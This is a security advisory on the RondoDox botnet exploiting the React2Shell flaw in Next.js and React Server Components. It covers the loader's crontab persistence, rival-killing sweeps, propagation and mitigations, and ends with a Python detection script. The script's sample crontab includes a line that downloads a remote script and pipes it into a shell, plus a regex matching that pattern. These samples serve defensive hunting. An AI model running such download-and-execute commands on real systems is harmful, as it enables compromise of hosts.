The RondoDox botnet is actively exploiting a critical vulnerability tracked as React2Shell (CVE-2025-55182) to compromise exposed web servers and Internet of Things (IoT) devices. The flaw enables unauthenticated remote code execution in vulnerable Next.js and React Server Components (RSC) deployments, facilitating large-scale botnet enrollment and persistent compromise of affected systems. Observed activity indicates that threat actors are leveraging this vulnerability along with additional weaknesses to deploy modular botnet loaders, cryptocurrency miners, and Mirai-derived malware variants designed to maintain long-term control and suppress competing infections. Organizations operating unpatched React-based applications or exposed IoT infrastructure face elevated risk due to the ongoing, automated exploitation of this vulnerability.
React2Shell (CVE-2025-55182) is a remote code execution vulnerability affecting Next.js and React Server Components (RSC) that arises from improper handling of user-supplied input during server-side request processing. The vulnerability enables unauthenticated attackers to execute arbitrary commands by interacting with exposed application endpoints that do not adequately enforce input validation. With a CVSS score of 10.0, successful exploitation provides attackers with command execution within the context of the vulnerable server process, enabling the deployment of secondary payloads without requiring authentication or elevated privileges.
Exploitation is carried out through crafted HTTP requests sent to susceptible React or Next.js endpoints, resulting in the execution of attacker-controlled commands. RondoDox operators leverage this execution path to deploy follow-on malware components, including botnet agents and cryptocurrency mining payloads, establishing initial access to compromised web servers and Internet of Things (IoT) devices.
Following exploitation, the RondoDox botnet establishes persistence through a staged infection workflow. The observed attack lifecycle begins with reconnaissance and vulnerability identification, followed by automated exploitation and payload delivery. Command-and-control (C2) infrastructure distributes multiple payload types, including a proprietary malware loader referred to as nuts/bolts, along with cryptocurrency mining components used to monetize compromised systems.
The nuts/bolts loader establishes persistence by modifying crontab entries to ensure execution across system reboots. It enforces process-level control by periodically enumerating active processes and terminating non-whitelisted entries, including competing botnet agents and unauthorized cryptocurrency miners. Process enforcement is performed at regular intervals, observed at approximately every 45 seconds in analyzed samples, which suppresses rival infections and increases the likelihood that RondoDox retains exclusive control over compromised hosts.
In addition to persistence mechanisms, RondoDox employs self-protection techniques to reinforce its operational foothold. The nuts/bolts loader regularly monitors the system process list and terminates processes that do not conform to predefined allowlists, reducing the effectiveness of competing malware and interfering with certain defensive tooling. This approach increases the dwell time of the botnet on infected systems.
To expand its operational footprint, the botnet incorporates Mirai-derived malware variants that exploit known vulnerabilities in IoT devices, including routers and embedded systems. After initial compromise, infected hosts are used to scan for additional vulnerable Next.js servers and IoT devices, facilitating continued botnet growth. The combination of proprietary loaders and reused exploitation techniques allows the botnet to adapt its operations and sustain activity across diverse environments.
• Threat actors exploit the React2Shell (CVE-2025-55182) vulnerability in exposed Next.js or React Server Components to achieve unauthenticated remote code execution.
• Successful exploitation is followed by the deployment of malicious payloads, including cryptocurrency mining components and a proprietary botnet loader referred to as nuts/bolts.
• The nuts/bolts loader establishes persistence by modifying crontab entries to ensure that core botnet components remain active across system reboots.
• Process-level control is enforced through continuous enumeration and termination of non-whitelisted processes, suppressing competing malware and limiting reinfection by rival operators.
• Compromised systems are subsequently used to identify and exploit additional vulnerable IoT devices and Next.js servers, expanding botnet membership and operational reach.
React2Shell (CVE-2025-55182) presents a low-barrier exploitation pathway due to its unauthenticated nature and the absence of prerequisite access or elevated privileges. The vulnerability can be triggered through crafted HTTP requests targeting exposed application endpoints, enabling automated exploitation at scale. Given the widespread adoption of Next.js and React Server Components across modern web environments, the vulnerability significantly expands the available attack surface. Once exploited, affected systems can be rapidly integrated into botnet infrastructure through automated payload deployment, supporting high-volume and repeatable exploitation campaigns.
The active exploitation of React2Shell (CVE-2025-55182) by the RondoDox botnet underscores the risk posed by unauthenticated remote code execution vulnerabilities in widely deployed web frameworks. By combining automated exploitation with persistent loaders, self-defense mechanisms, and Mirai-derived propagation techniques, RondoDox demonstrates an operational approach focused on scalability, resilience, and long-term control of compromised infrastructure. Organizations operating vulnerable Next.js applications or exposed IoT devices face an increased likelihood of sustained compromise unless mitigations are promptly applied.
The exploitation of React2Shell (CVE-2025-55182) enables RondoDox operators to establish persistent control over affected web servers and Internet of Things (IoT) devices, converting them into nodes for resource hijacking, distributed denial-of-service (DDoS) activity, and cryptocurrency mining. Compromised systems may serve as long-lived points of attack, increasing the likelihood of sustained operational disruption and unauthorized infrastructure use. The botnet’s ability to propagate laterally, suppress competing malware, and reduce forensic visibility extends the potential impact across interconnected environments, elevating the risk of broader infrastructure abuse and reputational damage for affected organizations.
• Apply vendor-provided patches and updates to all vulnerable Next.js and React Server Components deployments to mitigate exploitation of React2Shell (CVE-2025-55182).
• Implement network segmentation controls to isolate IoT devices and exposed application servers, reducing the potential for lateral movement following compromise.
• Deploy Web Application Firewalls (WAFs) configured to detect and block exploitation attempts targeting known remote code execution vectors.
• Monitor systems for indicators of compromise, including unauthorized crontab modifications, abnormal process termination patterns, and unexpected resource utilization consistent with botnet or cryptocurrency mining activity.
• Block outbound communication with known RondoDox command-and-control (C2) infrastructure and proactively hunt for network traffic patterns indicative of botnet activity.
• Conduct regular vulnerability assessments and hardening of exposed web servers and IoT devices to reduce the likelihood of future exploitation.
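The loader behaviour described above (crontab persistence and a process-kill sweep roughly every 45 seconds) and the monitoring recommendation for unauthorized crontab modifications and abnormal process termination patterns can be turned into a simple host-level hunt. The following is an added example, not code from the advisory or from any vendor tooling; the crontab lines, PIDs, paths and the 203.0.113.10 address are constructed placeholders, since the advisory publishes no indicators, and the kill events are assumed to come from an audit-style source that records sender PID, target PID and signal.

```python
import re
from collections import defaultdict

# Constructed sample crontab (paths, names and the 203.0.113.10 address are
# placeholders, not real RondoDox indicators; the advisory publishes none).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
@reboot /tmp/.x/loader >/dev/null 2>&1
*/5 * * * * wget -q -O- http://203.0.113.10/stage.sh | sh
"""

# Constructed audit-style kill events: (epoch seconds, sender pid, target pid, signal).
SAMPLE_KILL_EVENTS = [
    (1000, 4242, 3101, 9), (1000, 4242, 3102, 9),   # sweep 1
    (1045, 4242, 3101, 9),                          # sweep 2, +45 s
    (1090, 4242, 3103, 9),                          # sweep 3, +45 s
    (1135, 4242, 3102, 9),                          # sweep 4, +45 s
    (1010, 1, 2222, 15),                            # init sending SIGTERM: benign
    (1200, 900, 2500, 9),                           # one-off SIGKILL: not periodic
]

# Cron entries that run from world-writable scratch dirs at boot, or pipe a
# download straight into a shell, match the persistence pattern described above.
SUSPICIOUS_CRON = re.compile(
    r"@reboot\s+/(tmp|var/tmp|dev/shm)/|\b(wget|curl)\b[^|]*\|\s*(sh|bash)\b")

def suspicious_cron_entries(crontab_text):
    """Return crontab lines (comments skipped) matching the persistence heuristic."""
    return [s for ln in crontab_text.splitlines()
            if (s := ln.strip()) and not s.startswith("#") and SUSPICIOUS_CRON.search(s)]

def periodic_killers(events, period=45, tolerance=5, min_sweeps=3):
    """Flag sender PIDs that SIGKILL several distinct targets in sweeps spaced
    about `period` seconds apart (the ~45 s cadence reported for the loader).
    Returns {sender_pid: (sweep_count, sorted target pids)}."""
    sweeps, targets = defaultdict(set), defaultdict(set)
    for ts, sender, target, sig in events:
        if sig == 9:                      # only hard kills are of interest here
            sweeps[sender].add(ts)
            targets[sender].add(target)
    flagged = {}
    for sender, times in sweeps.items():
        ordered = sorted(times)
        gaps = [b - a for a, b in zip(ordered, ordered[1:])]
        regular = sum(1 for g in gaps if abs(g - period) <= tolerance)
        if len(ordered) >= min_sweeps and regular >= min_sweeps - 1 and len(targets[sender]) > 1:
            flagged[sender] = (len(ordered), sorted(targets[sender]))
    return flagged

if __name__ == "__main__":
    print("suspicious cron entries:", suspicious_cron_entries(SAMPLE_CRONTAB))
    print("periodic killers:", periodic_killers(SAMPLE_KILL_EVENTS))
```

On a live host the same functions can be fed the output of `crontab -l` for each user and kill events from auditd or eBPF tracing; tune `period` and `tolerance` to the cadence seen in your own samples.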
https://www.trendmicro.com/en/research/25/l/CVE-2025-55182-analysis-poc-itw.html